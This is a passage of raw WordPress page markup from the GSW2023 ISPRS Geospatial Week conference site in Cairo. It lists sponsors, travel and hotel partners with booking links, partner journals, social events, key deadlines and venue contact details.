alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145725824{margin-top: -90px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145657186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"https://abe.com.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/V-ABE-Logo-5.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p><p style=\"text-align: center;\"><a href=\"https://www.esa.gov.eg/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-5339 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/survey.jpg\" alt=\"\" width=\"246\" height=\"185\" /></p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n<p style=\"text-align: center;\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/08/mgeo.jpg\" alt=\"\" width=\"324\" height=\"121\" /><br />\r\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text]</p>\r\n<h5 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Bronze Sponsors</strong></span></h5>\r\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1692145894928{margin-top: -60px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1692145841186{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<p>&nbsp;</p>\r\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 